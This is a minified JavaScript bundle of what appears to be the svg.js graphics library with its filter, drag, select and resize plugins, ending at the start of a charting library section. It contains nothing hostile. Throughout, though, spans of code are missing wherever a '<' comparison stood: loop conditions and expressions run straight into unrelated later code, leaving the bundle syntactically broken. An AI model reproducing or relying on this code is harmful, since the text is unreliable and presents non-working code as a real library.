n.Number(this+e,this.unit||e.unit)},minus:function(e){return e=new n.Number(e),new n.Number(this-e,this.unit||e.unit)},times:function(e){return e=new n.Number(e),new n.Number(this*e,this.unit||e.unit)},divide:function(e){return e=new n.Number(e),new n.Number(this/e,this.unit||e.unit)},to:function(e){var a=new n.Number(this);return"string"==typeof e&&(a.unit=e),a},morph:function(e){return this.destination=new n.Number(e),e.relative&&(this.destination.value+=this.value),this},at:function(e){return this.destination?new n.Number(this.destination).minus(this).times(e).plus(this):this}}}),n.Element=n.invent({create:function(e){this._stroke=n.defaults.attrs.stroke,this._event=null,this.dom={},(this.node=e)&&(this.type=e.nodeName,this.node.instance=this,this._stroke=e.getAttribute("stroke")||this._stroke)},extend:{x:function(e){return this.attr("x",e)},y:function(e){return this.attr("y",e)},cx:function(e){return null==e?this.x()+this.width()/2:this.x(e-this.width()/2)},cy:function(e){return null==e?this.y()+this.height()/2:this.y(e-this.height()/2)},move:function(e,a){return this.x(e).y(a)},center:function(e,a){return this.cx(e).cy(a)},width:function(e){return this.attr("width",e)},height:function(e){return this.attr("height",e)},size:function(e,a){var i=p(this,e,a);return this.width(new n.Number(i.width)).height(new n.Number(i.height))},clone:function(e){this.writeDataToDom();var a=v(this.node.cloneNode(!0));return e?e.add(a):this.after(a),a},remove:function(){return this.parent()&&this.parent().removeElement(this),this},replace:function(e){return this.after(e).remove(),e},addTo:function(e){return e.put(this)},putIn:function(e){return e.add(this)},id:function(e){return this.attr("id",e)},show:function(){return this.style("display","")},hide:function(){return this.style("display","none")},visible:function(){return"none"!=this.style("display")},toString:function(){return this.attr("id")},classes:function(){var e=this.attr("class");return null==e?[]:e.trim().split(n.regex.delimiter)},hasClass:function(e){return-1!=this.classes().indexOf(e)},addClass:function(e){if(!this.hasClass(e)){var a=this.classes();a.push(e),this.attr("class",a.join(" "))}return this},removeClass:function(e){return this.hasClass(e)&&this.attr("class",this.classes().filter((function(a){return a!=e})).join(" ")),this},toggleClass:function(e){return this.hasClass(e)?this.removeClass(e):this.addClass(e)},reference:function(e){return n.get(this.attr(e))},parent:function(a){var i=this;if(!i.node.parentNode)return null;if(i=n.adopt(i.node.parentNode),!a)return i;for(;i&&i.node instanceof e.SVGElement;){if("string"==typeof a?i.matches(a):i instanceof a)return i;if(!i.node.parentNode||"#document"==i.node.parentNode.nodeName)return null;i=n.adopt(i.node.parentNode)}},doc:function(){return this instanceof n.Doc?this:this.parent(n.Doc)},parents:function(e){var a=[],n=this;do{if(!(n=n.parent(e))||!n.node)break;a.push(n)}while(n.parent);return a},matches:function(e){return function(e,a){return(e.matches||e.matchesSelector||e.msMatchesSelector||e.mozMatchesSelector||e.webkitMatchesSelector||e.oMatchesSelector).call(e,a)}(this.node,e)},native:function(){return this.node},svg:function(e){var i=a.createElement("svg");if(!(e&&this instanceof n.Parent))return i.appendChild(e=a.createElement("svg")),this.writeDataToDom(),e.appendChild(this.node.cloneNode(!0)),i.innerHTML.replace(/^/,"").replace(/<\/svg>$/,"");i.innerHTML=""+e.replace(/\n/,"").replace(/<([\w:-]+)([^<]+?)\/>/g,"<$1$2>")+"";for(var t=0,r=i.firstChild.childNodes.length;t":function(e){return-Math.cos(e*Math.PI)/2+.5},">":function(e){return Math.sin(e*Math.PI/2)},"<":function(e){return 1-Math.cos(e*Math.PI/2)}},n.morph=function(e){return function(a,i){return new n.MorphObj(a,i).at(e)}},n.Situation=n.invent({create:function(e){this.init=!1,this.reversed=!1,this.reversing=!1,this.duration=new n.Number(e.duration).valueOf(),this.delay=new n.Number(e.delay).valueOf(),this.start=+new Date+this.delay,this.finish=this.start+this.duration,this.ease=e.ease,this.loop=0,this.loops=!1,this.animations={},this.attrs={},this.styles={},this.transforms=[],this.once={}}}),n.FX=n.invent({create:function(e){this._target=e,this.situations=[],this.active=!1,this.situation=null,this.paused=!1,this.lastPos=0,this.pos=0,this.absPos=0,this._speed=1},extend:{animate:function(e,a,i){"object"===o(e)&&(a=e.ease,i=e.delay,e=e.duration);var t=new n.Situation({duration:e||1e3,delay:i||0,ease:n.easing[a||"-"]||a});return this.queue(t),this},target:function(e){return e&&e instanceof n.Element?(this._target=e,this):this._target},timeToAbsPos:function(e){return(e-this.situation.start)/(this.situation.duration/this._speed)},absPosToTime:function(e){return this.situation.duration/this._speed*e+this.situation.start},startAnimFrame:function(){this.stopAnimFrame(),this.animationFrame=e.requestAnimationFrame(function(){this.step()}.bind(this))},stopAnimFrame:function(){e.cancelAnimationFrame(this.animationFrame)},start:function(){return!this.active&&this.situation&&(this.active=!0,this.startCurrent()),this},startCurrent:function(){return this.situation.start=+new Date+this.situation.delay/this._speed,this.situation.finish=this.situation.start+this.situation.duration/this._speed,this.initAnimations().step()},queue:function(e){return("function"==typeof e||e instanceof n.Situation)&&this.situations.push(e),this.situation||(this.situation=this.situations.shift()),this},dequeue:function(){return this.stop(),this.situation=this.situations.shift(),this.situation&&(this.situation instanceof n.Situation?this.start():this.situation.call(this)),this},initAnimations:function(){var e,a=this.situation;if(a.init)return this;for(var i in a.animations){e=this.target()[i](),Array.isArray(e)||(e=[e]),Array.isArray(a.animations[i])||(a.animations[i]=[a.animations[i]]);for(var t=e.length;t--;)a.animations[i][t]instanceof n.Number&&(e[t]=new n.Number(e[t])),a.animations[i][t]=e[t].morph(a.animations[i][t])}for(var i in a.attrs)a.attrs[i]=new n.MorphObj(this.target().attr(i),a.attrs[i]);for(var i in a.styles)a.styles[i]=new n.MorphObj(this.target().style(i),a.styles[i]);return a.initialTransformation=this.target().matrixify(),a.init=!0,this},clearQueue:function(){return this.situations=[],this},clearCurrent:function(){return this.situation=null,this},stop:function(e,a){var n=this.active;return this.active=!1,a&&this.clearQueue(),e&&this.situation&&(!n&&this.startCurrent(),this.atEnd()),this.stopAnimFrame(),this.clearCurrent()},after:function(e){var a=this.last();return this.target().on("finished.fx",(function n(i){i.detail.situation==a&&(e.call(this,a),this.off("finished.fx",n))})),this._callStart()},during:function(e){var a=this.last(),i=function(i){i.detail.situation==a&&e.call(this,i.detail.pos,n.morph(i.detail.pos),i.detail.eased,a)};return this.target().off("during.fx",i).on("during.fx",i),this.after((function(){this.off("during.fx",i)})),this._callStart()},afterAll:function(e){var a=function a(n){e.call(this),this.off("allfinished.fx",a)};return this.target().off("allfinished.fx",a).on("allfinished.fx",a),this._callStart()},last:function(){return this.situations.length?this.situations[this.situations.length-1]:this.situation},add:function(e,a,n){return this.last()[n||"animations"][e]=a,this._callStart()},step:function(e){var a,n,i;e||(this.absPos=this.timeToAbsPos(+new Date)),!1!==this.situation.loops?(a=Math.max(this.absPos,0),n=Math.floor(a),!0===this.situation.loops||nthis.lastPos&&r<=t&&(this.situation.once[r].call(this.target(),this.pos,t),delete this.situation.once[r]);return this.active&&this.target().fire("during",{pos:this.pos,eased:t,fx:this,situation:this.situation}),this.situation?(this.eachAt(),1==this.pos&&!this.situation.reversed||this.situation.reversed&&0==this.pos?(this.stopAnimFrame(),this.target().fire("finished",{fx:this,situation:this.situation}),this.situations.length||(this.target().fire("allfinished"),this.situations.length||(this.target().off(".fx"),this.active=!1)),this.active?this.dequeue():this.clearCurrent()):!this.paused&&this.active&&this.startAnimFrame(),this.lastPos=t,this):this},eachAt:function(){var e,a=this,i=this.target(),t=this.situation;for(var r in t.animations)e=[].concat(t.animations[r]).map((function(e){return"string"!=typeof e&&e.at?e.at(t.ease(a.pos),a.pos):e})),i[r].apply(i,e);for(var r in t.attrs)e=[r].concat(t.attrs[r]).map((function(e){return"string"!=typeof e&&e.at?e.at(t.ease(a.pos),a.pos):e})),i.attr.apply(i,e);for(var r in t.styles)e=[r].concat(t.styles[r]).map((function(e){return"string"!=typeof e&&e.at?e.at(t.ease(a.pos),a.pos):e})),i.style.apply(i,e);if(t.transforms.length){e=t.initialTransformation,r=0;for(var o=t.transforms.length;r=0;--i)this[k[i]]=null!=e[k[i]]?e[k[i]]:a[k[i]]},extend:{extract:function(){var e=m(this,0,1);m(this,1,0);var a=180/Math.PI*Math.atan2(e.y,e.x)-90;return{x:this.e,y:this.f,transformedX:(this.e*Math.cos(a*Math.PI/180)+this.f*Math.sin(a*Math.PI/180))/Math.sqrt(this.a*this.a+this.b*this.b),transformedY:(this.f*Math.cos(a*Math.PI/180)+this.e*Math.sin(-a*Math.PI/180))/Math.sqrt(this.c*this.c+this.d*this.d),rotation:a,a:this.a,b:this.b,c:this.c,d:this.d,e:this.e,f:this.f,matrix:new n.Matrix(this)}},clone:function(){return new n.Matrix(this)},morph:function(e){return this.destination=new n.Matrix(e),this},multiply:function(e){return new n.Matrix(this.native().multiply(function(e){return e instanceof n.Matrix||(e=new n.Matrix(e)),e}(e).native()))},inverse:function(){return new n.Matrix(this.native().inverse())},translate:function(e,a){return new n.Matrix(this.native().translate(e||0,a||0))},native:function(){for(var e=n.parser.native.createSVGMatrix(),a=k.length-1;a>=0;a--)e[k[a]]=this[k[a]];return e},toString:function(){return"matrix("+b(this.a)+","+b(this.b)+","+b(this.c)+","+b(this.d)+","+b(this.e)+","+b(this.f)+")"}},parent:n.Element,construct:{ctm:function(){return new n.Matrix(this.node.getCTM())},screenCTM:function(){if(this instanceof n.Nested){var e=this.rect(1,1),a=e.node.getScreenCTM();return e.remove(),new n.Matrix(a)}return new n.Matrix(this.node.getScreenCTM())}}}),n.Point=n.invent({create:function(e,a){var n;n=Array.isArray(e)?{x:e[0],y:e[1]}:"object"===o(e)?{x:e.x,y:e.y}:null!=e?{x:e,y:null!=a?a:e}:{x:0,y:0},this.x=n.x,this.y=n.y},extend:{clone:function(){return new n.Point(this)},morph:function(e,a){return this.destination=new n.Point(e,a),this}}}),n.extend(n.Element,{point:function(e,a){return new n.Point(e,a).transform(this.screenCTM().inverse())}}),n.extend(n.Element,{attr:function(e,a,i){if(null==e){for(e={},i=(a=this.node.attributes).length-1;i>=0;i--)e[a[i].nodeName]=n.regex.isNumber.test(a[i].nodeValue)?parseFloat(a[i].nodeValue):a[i].nodeValue;return e}if("object"===o(e))for(var t in e)this.attr(t,e[t]);else if(null===a)this.node.removeAttribute(e);else{if(null==a)return null==(a=this.node.getAttribute(e))?n.defaults.attrs[e]:n.regex.isNumber.test(a)?parseFloat(a):a;"stroke-width"==e?this.attr("stroke",parseFloat(a)>0?this._stroke:null):"stroke"==e&&(this._stroke=a),"fill"!=e&&"stroke"!=e||(n.regex.isImage.test(a)&&(a=this.doc().defs().image(a,0,0)),a instanceof n.Image&&(a=this.doc().defs().pattern(0,0,(function(){this.add(a)})))),"number"==typeof a?a=new n.Number(a):n.Color.isColor(a)?a=new n.Color(a):Array.isArray(a)&&(a=new n.Array(a)),"leading"==e?this.leading&&this.leading(a):"string"==typeof i?this.node.setAttributeNS(i,e,a.toString()):this.node.setAttribute(e,a.toString()),!this.rebuild||"font-size"!=e&&"x"!=e||this.rebuild(e,a)}return this}}),n.extend(n.Element,{transform:function(e,a){var i;return"object"!==o(e)?(i=new n.Matrix(this).extract(),"string"==typeof e?i[e]:i):(i=new n.Matrix(this),a=!!a||!!e.relative,null!=e.a&&(i=a?i.multiply(new n.Matrix(e)):new n.Matrix(e)),this.attr("transform",i))}}),n.extend(n.Element,{untransform:function(){return this.attr("transform",null)},matrixify:function(){return(this.attr("transform")||"").split(n.regex.transforms).slice(0,-1).map((function(e){var a=e.trim().split("(");return[a[0],a[1].split(n.regex.delimiter).map((function(e){return parseFloat(e)}))]})).reduce((function(e,a){return"matrix"==a[0]?e.multiply(f(a[1])):e[a[0]].apply(e,a[1])}),new n.Matrix)},toParent:function(e){if(this==e)return this;var a=this.screenCTM(),n=e.screenCTM().inverse();return this.addTo(e).untransform().transform(n.multiply(a)),this},toDoc:function(){return this.toParent(this.doc())}}),n.Transformation=n.invent({create:function(e,a){if(arguments.length>1&&"boolean"!=typeof a)return this.constructor.call(this,[].slice.call(arguments));if(Array.isArray(e))for(var n=0,i=this.arguments.length;n=0},index:function(e){return[].slice.call(this.node.childNodes).indexOf(e.node)},get:function(e){return n.adopt(this.node.childNodes[e])},first:function(){return this.get(0)},last:function(){return this.get(this.node.childNodes.length-1)},each:function(e,a){for(var i=this.children(),t=0,r=i.length;t=0;i--)a.childNodes[i]instanceof e.SVGElement&&v(a.childNodes[i]);return n.adopt(a).id(n.eid(a.nodeName))}function g(e){return null==e.x&&(e.x=0,e.y=0,e.width=0,e.height=0),e.w=e.width,e.h=e.height,e.x2=e.x+e.width,e.y2=e.y+e.height,e.cx=e.x+e.width/2,e.cy=e.y+e.height/2,e}function b(e){return Math.abs(e)>1e-37?e:0}["fill","stroke"].forEach((function(e){var a={};a[e]=function(a){if(void 0===a)return this;if("string"==typeof a||n.Color.isRgb(a)||a&&"function"==typeof a.fill)this.attr(e,a);else for(var i=l[e].length-1;i>=0;i--)null!=a[l[e][i]]&&this.attr(l.prefix(e,l[e][i]),a[l[e][i]]);return this},n.extend(n.Element,n.FX,a)})),n.extend(n.Element,n.FX,{translate:function(e,a){return this.transform({x:e,y:a})},matrix:function(e){return this.attr("transform",new n.Matrix(6==arguments.length?[].slice.call(arguments):e))},opacity:function(e){return this.attr("opacity",e)},dx:function(e){return this.x(new n.Number(e).plus(this instanceof n.FX?0:this.x()),!0)},dy:function(e){return this.y(new n.Number(e).plus(this instanceof n.FX?0:this.y()),!0)}}),n.extend(n.Path,{length:function(){return this.node.getTotalLength()},pointAt:function(e){return this.node.getPointAtLength(e)}}),n.Set=n.invent({create:function(e){Array.isArray(e)?this.members=e:this.clear()},extend:{add:function(){for(var e=[].slice.call(arguments),a=0,n=e.length;a-1&&this.members.splice(a,1),this},each:function(e){for(var a=0,n=this.members.length;a=0},index:function(e){return this.members.indexOf(e)},get:function(e){return this.members[e]},first:function(){return this.get(0)},last:function(){return this.get(this.members.length-1)},valueOf:function(){return this.members}},construct:{set:function(e){return new n.Set(e)}}}),n.FX.Set=n.invent({create:function(e){this.set=e}}),n.Set.inherit=function(){var e=[];for(var a in n.Shape.prototype)"function"==typeof n.Shape.prototype[a]&&"function"!=typeof n.Set.prototype[a]&&e.push(a);for(var a in e.forEach((function(e){n.Set.prototype[e]=function(){for(var a=0,i=this.members.length;a=0;e--)delete this.memory()[arguments[e]];return this},memory:function(){return this._memory||(this._memory={})}}),n.get=function(e){var i=a.getElementById(function(e){var a=(e||"").toString().match(n.regex.reference);if(a)return a[1]}(e)||e);return n.adopt(i)},n.select=function(e,i){return new n.Set(n.utils.map((i||a).querySelectorAll(e),(function(e){return n.adopt(e)})))},n.extend(n.Parent,{select:function(e){return n.select(e,this.node)}});var k="abcdef".split("");if("function"!=typeof e.CustomEvent){var y=function(e,n){n=n||{bubbles:!1,cancelable:!1,detail:void 0};var i=a.createEvent("CustomEvent");return i.initCustomEvent(e,n.bubbles,n.cancelable,n.detail),i};y.prototype=e.Event.prototype,n.CustomEvent=y}else n.CustomEvent=e.CustomEvent;return n},void 0!==(i=function(){return Ee(Ne,Ne.document)}.call(a,n,a,e))&&(e.exports=i),function(){SVG.Filter=SVG.invent({create:"filter",inherit:SVG.Parent,extend:{source:"SourceGraphic",sourceAlpha:"SourceAlpha",background:"BackgroundImage",backgroundAlpha:"BackgroundAlpha",fill:"FillPaint",stroke:"StrokePaint",autoSetIn:!0,put:function(e,a){return this.add(e,a),!e.attr("in")&&this.autoSetIn&&e.attr("in",this.source),e.attr("result")||e.attr("result",e),e},blend:function(e,a,n){return this.put(new SVG.BlendEffect(e,a,n))},colorMatrix:function(e,a){return this.put(new SVG.ColorMatrixEffect(e,a))},convolveMatrix:function(e){return this.put(new SVG.ConvolveMatrixEffect(e))},componentTransfer:function(e){return this.put(new SVG.ComponentTransferEffect(e))},composite:function(e,a,n){return this.put(new SVG.CompositeEffect(e,a,n))},flood:function(e,a){return this.put(new SVG.FloodEffect(e,a))},offset:function(e,a){return this.put(new SVG.OffsetEffect(e,a))},image:function(e){return this.put(new SVG.ImageEffect(e))},merge:function(){var e=[void 0];for(var a in arguments)e.push(arguments[a]);return this.put(new(SVG.MergeEffect.bind.apply(SVG.MergeEffect,e)))},gaussianBlur:function(e,a){return this.put(new SVG.GaussianBlurEffect(e,a))},morphology:function(e,a){return this.put(new SVG.MorphologyEffect(e,a))},diffuseLighting:function(e,a,n){return this.put(new SVG.DiffuseLightingEffect(e,a,n))},displacementMap:function(e,a,n,i,t){return this.put(new SVG.DisplacementMapEffect(e,a,n,i,t))},specularLighting:function(e,a,n,i){return this.put(new SVG.SpecularLightingEffect(e,a,n,i))},tile:function(){return this.put(new SVG.TileEffect)},turbulence:function(e,a,n,i,t){return this.put(new SVG.TurbulenceEffect(e,a,n,i,t))},toString:function(){return"url(#"+this.attr("id")+")"}}}),SVG.extend(SVG.Defs,{filter:function(e){var a=this.put(new SVG.Filter);return"function"==typeof e&&e.call(a,a),a}}),SVG.extend(SVG.Container,{filter:function(e){return this.defs().filter(e)}}),SVG.extend(SVG.Element,SVG.G,SVG.Nested,{filter:function(e){return this.filterer=e instanceof SVG.Element?e:this.doc().filter(e),this.doc()&&this.filterer.doc()!==this.doc()&&this.doc().defs().add(this.filterer),this.attr("filter",this.filterer),this.filterer},unfilter:function(e){return this.filterer&&!0===e&&this.filterer.remove(),delete this.filterer,this.attr("filter",null)}}),SVG.Effect=SVG.invent({create:function(){this.constructor.call(this)},inherit:SVG.Element,extend:{in:function(e){return null==e?this.parent()&&this.parent().select('[result="'+this.attr("in")+'"]').get(0)||this.attr("in"):this.attr("in",e)},result:function(e){return null==e?this.attr("result"):this.attr("result",e)},toString:function(){return this.result()}}}),SVG.ParentEffect=SVG.invent({create:function(){this.constructor.call(this)},inherit:SVG.Parent,extend:{in:function(e){return null==e?this.parent()&&this.parent().select('[result="'+this.attr("in")+'"]').get(0)||this.attr("in"):this.attr("in",e)},result:function(e){return null==e?this.attr("result"):this.attr("result",e)},toString:function(){return this.result()}}});var e={blend:function(e,a){return this.parent()&&this.parent().blend(this,e,a)},colorMatrix:function(e,a){return this.parent()&&this.parent().colorMatrix(e,a).in(this)},convolveMatrix:function(e){return this.parent()&&this.parent().convolveMatrix(e).in(this)},componentTransfer:function(e){return this.parent()&&this.parent().componentTransfer(e).in(this)},composite:function(e,a){return this.parent()&&this.parent().composite(this,e,a)},flood:function(e,a){return this.parent()&&this.parent().flood(e,a)},offset:function(e,a){return this.parent()&&this.parent().offset(e,a).in(this)},image:function(e){return this.parent()&&this.parent().image(e)},merge:function(){return this.parent()&&this.parent().merge.apply(this.parent(),[this].concat(arguments))},gaussianBlur:function(e,a){return this.parent()&&this.parent().gaussianBlur(e,a).in(this)},morphology:function(e,a){return this.parent()&&this.parent().morphology(e,a).in(this)},diffuseLighting:function(e,a,n){return this.parent()&&this.parent().diffuseLighting(e,a,n).in(this)},displacementMap:function(e,a,n,i){return this.parent()&&this.parent().displacementMap(this,e,a,n,i)},specularLighting:function(e,a,n,i){return this.parent()&&this.parent().specularLighting(e,a,n,i).in(this)},tile:function(){return this.parent()&&this.parent().tile().in(this)},turbulence:function(e,a,n,i,t){return this.parent()&&this.parent().turbulence(e,a,n,i,t).in(this)}};SVG.extend(SVG.Effect,e),SVG.extend(SVG.ParentEffect,e),SVG.ChildEffect=SVG.invent({create:function(){this.constructor.call(this)},inherit:SVG.Element,extend:{in:function(e){this.attr("in",e)}}});var a={blend:function(e,a,n){this.attr({in:e,in2:a,mode:n||"normal"})},colorMatrix:function(e,a){"matrix"==e&&(a=t(a)),this.attr({type:e,values:void 0===a?null:a})},convolveMatrix:function(e){e=t(e),this.attr({order:Math.sqrt(e.split(" ").length),kernelMatrix:e})},composite:function(e,a,n){this.attr({in:e,in2:a,operator:n})},flood:function(e,a){this.attr("flood-color",e),null!=a&&this.attr("flood-opacity",a)},offset:function(e,a){this.attr({dx:e,dy:a})},image:function(e){this.attr("href",e,SVG.xlink)},displacementMap:function(e,a,n,i,t){this.attr({in:e,in2:a,scale:n,xChannelSelector:i,yChannelSelector:t})},gaussianBlur:function(e,a){null!=e||null!=a?this.attr("stdDeviation",r(Array.prototype.slice.call(arguments))):this.attr("stdDeviation","0 0")},morphology:function(e,a){this.attr({operator:e,radius:a})},tile:function(){},turbulence:function(e,a,n,i,t){this.attr({numOctaves:a,seed:n,stitchTiles:i,baseFrequency:e,type:t})}},n={merge:function(){var e;if(arguments[0]instanceof SVG.Set){var a=this;arguments[0].each((function(e){this instanceof SVG.MergeNode?a.put(this):(this instanceof SVG.Effect||this instanceof SVG.ParentEffect)&&a.put(new SVG.MergeNode(this))}))}else{e=Array.isArray(arguments[0])?arguments[0]:arguments;for(var n=0;n1&&(P*=i=Math.sqrt(i),B*=i),t=(new SVG.Matrix).rotate(T).scale(1/P,1/B).rotate(-T),R=R.transform(t),s=(r=[(K=K.transform(t)).x-R.x,K.y-R.y])[0]*r[0]+r[1]*r[1],o=Math.sqrt(s),r[0]/=o,r[1]/=o,l=s<4?Math.sqrt(1-s/4):0,L===z&&(l*=-1),u=new SVG.Point((K.x+R.x)/2+l*-r[1],(K.y+R.y)/2+l*r[0]),c=new SVG.Point(R.x-u.x,R.y-u.y),d=new SVG.Point(K.x-u.x,K.y-u.y),h=Math.acos(c.x/Math.sqrt(c.x*c.x+c.y*c.y)),c.y<0&&(h*=-1),p=Math.acos(d.x/Math.sqrt(d.x*d.x+d.y*d.y)),d.y<0&&(p*=-1),z&&h>p&&(p+=2*Math.PI),!z&&hr.maxX-a.width&&(o=(i=r.maxX-a.width)-this.startPoints.box.x),null!=r.minY&&tr.maxY-a.height&&(s=(t=r.maxY-a.height)-this.startPoints.box.y),null!=r.snapToGrid&&(i-=i%r.snapToGrid,t-=t%r.snapToGrid,o-=o%r.snapToGrid,s-=s%r.snapToGrid),this.el instanceof SVG.G?this.el.matrix(this.startPoints.transform).transform({x:o,y:s},!0):this.el.move(i,t));return n},e.prototype.end=function(e){var a=this.drag(e);this.el.fire("dragend",{event:e,p:a,m:this.m,handler:this}),SVG.off(window,"mousemove.drag"),SVG.off(window,"touchmove.drag"),SVG.off(window,"mouseup.drag"),SVG.off(window,"touchend.drag")},SVG.extend(SVG.Element,{draggable:function(a,n){"function"!=typeof a&&"object"!=typeof a||(n=a,a=!0);var i=this.remember("_draggable")||new e(this);return(a=void 0===a||a)?i.init(n||{},a):(this.off("mousedown.drag"),this.off("touchstart.drag")),this}})}.call(void 0),function(){function e(e){this.el=e,e.remember("_selectHandler",this),this.pointSelection={isSelected:!1},this.rectSelection={isSelected:!1},this.pointsList={lt:[0,0],rt:["width",0],rb:["width","height"],lb:[0,"height"],t:["width",0],r:["width","height"],b:["width","height"],l:[0,"height"]},this.pointCoord=function(e,a,n){var i="string"!=typeof e?e:a[e];return n?i/2:i},this.pointCoords=function(e,a){var n=this.pointsList[e];return{x:this.pointCoord(n[0],a,"t"===e||"b"===e),y:this.pointCoord(n[1],a,"r"===e||"l"===e)}}}e.prototype.init=function(e,a){var n=this.el.bbox();this.options={};var i=this.el.selectize.defaults.points;for(var t in this.el.selectize.defaults)this.options[t]=this.el.selectize.defaults[t],void 0!==a[t]&&(this.options[t]=a[t]);var r=["points","pointsExclude"];for(var t in r){var o=this.options[r[t]];"string"==typeof o?o=o.length>0?o.split(/\s*,\s*/i):[]:"boolean"==typeof o&&"points"===r[t]&&(o=o?i:[]),this.options[r[t]]=o}this.options.points=[i,this.options.points].reduce((function(e,a){return e.filter((function(e){return a.indexOf(e)>-1}))})),this.options.points=[this.options.points,this.options.pointsExclude].reduce((function(e,a){return e.filter((function(e){return a.indexOf(e)<0}))})),this.parent=this.el.parent(),this.nested=this.nested||this.parent.group(),this.nested.matrix(new SVG.Matrix(this.el).translate(n.x,n.y)),this.options.deepSelect&&-1!==["line","polyline","polygon"].indexOf(this.el.type)?this.selectPoints(e):this.selectRect(e),this.observe(),this.cleanup()},e.prototype.selectPoints=function(e){return this.pointSelection.isSelected=e,this.pointSelection.set||(this.pointSelection.set=this.parent.set(),this.drawPoints()),this},e.prototype.getPointArray=function(){var e=this.el.bbox();return this.el.array().valueOf().map((function(a){return[a[0]-e.x,a[1]-e.y]}))},e.prototype.drawPoints=function(){for(var e=this,a=this.getPointArray(),n=0,i=a.length;n0&&this.parameters.box.height-n[1]>0){if("text"===this.parameters.type)return this.el.move(this.parameters.box.x+n[0],this.parameters.box.y),void this.el.attr("font-size",this.parameters.fontSize-n[0]);n=this.checkAspectRatio(n),this.el.move(this.parameters.box.x+n[0],this.parameters.box.y+n[1]).size(this.parameters.box.width-n[0],this.parameters.box.height-n[1])}};break;case"rt":this.calc=function(e,a){var n=this.snapToGrid(e,a,2);if(this.parameters.box.width+n[0]>0&&this.parameters.box.height-n[1]>0){if("text"===this.parameters.type)return this.el.move(this.parameters.box.x-n[0],this.parameters.box.y),void this.el.attr("font-size",this.parameters.fontSize+n[0]);n=this.checkAspectRatio(n,!0),this.el.move(this.parameters.box.x,this.parameters.box.y+n[1]).size(this.parameters.box.width+n[0],this.parameters.box.height-n[1])}};break;case"rb":this.calc=function(e,a){var n=this.snapToGrid(e,a,0);if(this.parameters.box.width+n[0]>0&&this.parameters.box.height+n[1]>0){if("text"===this.parameters.type)return this.el.move(this.parameters.box.x-n[0],this.parameters.box.y),void this.el.attr("font-size",this.parameters.fontSize+n[0]);n=this.checkAspectRatio(n),this.el.move(this.parameters.box.x,this.parameters.box.y).size(this.parameters.box.width+n[0],this.parameters.box.height+n[1])}};break;case"lb":this.calc=function(e,a){var n=this.snapToGrid(e,a,1);if(this.parameters.box.width-n[0]>0&&this.parameters.box.height+n[1]>0){if("text"===this.parameters.type)return this.el.move(this.parameters.box.x+n[0],this.parameters.box.y),void this.el.attr("font-size",this.parameters.fontSize-n[0]);n=this.checkAspectRatio(n,!0),this.el.move(this.parameters.box.x+n[0],this.parameters.box.y).size(this.parameters.box.width-n[0],this.parameters.box.height+n[1])}};break;case"t":this.calc=function(e,a){var n=this.snapToGrid(e,a,2);if(this.parameters.box.height-n[1]>0){if("text"===this.parameters.type)return;this.el.move(this.parameters.box.x,this.parameters.box.y+n[1]).height(this.parameters.box.height-n[1])}};break;case"r":this.calc=function(e,a){var n=this.snapToGrid(e,a,0);if(this.parameters.box.width+n[0]>0){if("text"===this.parameters.type)return;this.el.move(this.parameters.box.x,this.parameters.box.y).width(this.parameters.box.width+n[0])}};break;case"b":this.calc=function(e,a){var n=this.snapToGrid(e,a,0);if(this.parameters.box.height+n[1]>0){if("text"===this.parameters.type)return;this.el.move(this.parameters.box.x,this.parameters.box.y).height(this.parameters.box.height+n[1])}};break;case"l":this.calc=function(e,a){var n=this.snapToGrid(e,a,1);if(this.parameters.box.width-n[0]>0){if("text"===this.parameters.type)return;this.el.move(this.parameters.box.x+n[0],this.parameters.box.y).width(this.parameters.box.width-n[0])}};break;case"rot":this.calc=function(e,a){var n=e+this.parameters.p.x,i=a+this.parameters.p.y,t=Math.atan2(this.parameters.p.y-this.parameters.box.y-this.parameters.box.height/2,this.parameters.p.x-this.parameters.box.x-this.parameters.box.width/2),r=Math.atan2(i-this.parameters.box.y-this.parameters.box.height/2,n-this.parameters.box.x-this.parameters.box.width/2),o=this.parameters.rotation+180*(r-t)/Math.PI+this.options.snapToAngle/2;this.el.center(this.parameters.box.cx,this.parameters.box.cy).rotate(o-o%this.options.snapToAngle,this.parameters.box.cx,this.parameters.box.cy)};break;case"point":this.calc=function(e,a){var n=this.snapToGrid(e,a,this.parameters.pointCoords[0],this.parameters.pointCoords[1]),i=this.el.array().valueOf();i[this.parameters.i][0]=this.parameters.pointCoords[0]+n[0],i[this.parameters.i][1]=this.parameters.pointCoords[1]+n[1],this.el.plot(i)}}this.el.fire("resizestart",{dx:this.parameters.x,dy:this.parameters.y,event:e}),SVG.on(window,"touchmove.resize",(function(e){a.update(e||window.event)})),SVG.on(window,"touchend.resize",(function(){a.done()})),SVG.on(window,"mousemove.resize",(function(e){a.update(e||window.event)})),SVG.on(window,"mouseup.resize",(function(){a.done()}))},e.prototype.update=function(e){if(e){var a=this._extractPosition(e),n=this.transformPoint(a.x,a.y),i=n.x-this.parameters.p.x,t=n.y-this.parameters.p.y;this.lastUpdateCall=[i,t],this.calc(i,t),this.el.fire("resizing",{dx:i,dy:t,event:e})}else this.lastUpdateCall&&this.calc(this.lastUpdateCall[0],this.lastUpdateCall[1])},e.prototype.done=function(){this.lastUpdateCall=null,SVG.off(window,"mousemove.resize"),SVG.off(window,"mouseup.resize"),SVG.off(window,"touchmove.resize"),SVG.off(window,"touchend.resize"),this.el.fire("resizedone")},e.prototype.snapToGrid=function(e,a,n,i){var t;return void 0!==i?t=[(n+e)%this.options.snapToGrid,(i+a)%this.options.snapToGrid]:(n=null==n?3:n,t=[(this.parameters.box.x+e+(1&n?0:this.parameters.box.width))%this.options.snapToGrid,(this.parameters.box.y+a+(2&n?0:this.parameters.box.height))%this.options.snapToGrid]),e<0&&(t[0]-=this.options.snapToGrid),a<0&&(t[1]-=this.options.snapToGrid),e-=Math.abs(t[0])o.maxX&&(e=o.maxX-t),void 0!==o.minY&&r+ao.maxY&&(a=o.maxY-r),[e,a]},e.prototype.checkAspectRatio=function(e,a){if(!this.options.saveAspectRatio)return e;var n=e.slice(),i=this.parameters.box.width/this.parameters.box.height,t=this.parameters.box.width+e[0],r=this.parameters.box.height-e[1],o=t/r;return oi&&(n[0]=this.parameters.box.width-r*i,a&&(n[0]=-n[0])),n},SVG.extend(SVG.Element,{resize:function(a){return(this.remember("_resizeHandler")||new e(this)).init(a||{}),this}}),SVG.Element.prototype.resize.defaults={snapToAngle:.1,snapToGrid:1,constraint:{},saveAspectRatio:!1}}).call(this)}(),void 0===window.Apex&&(window.Apex={});var He=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return 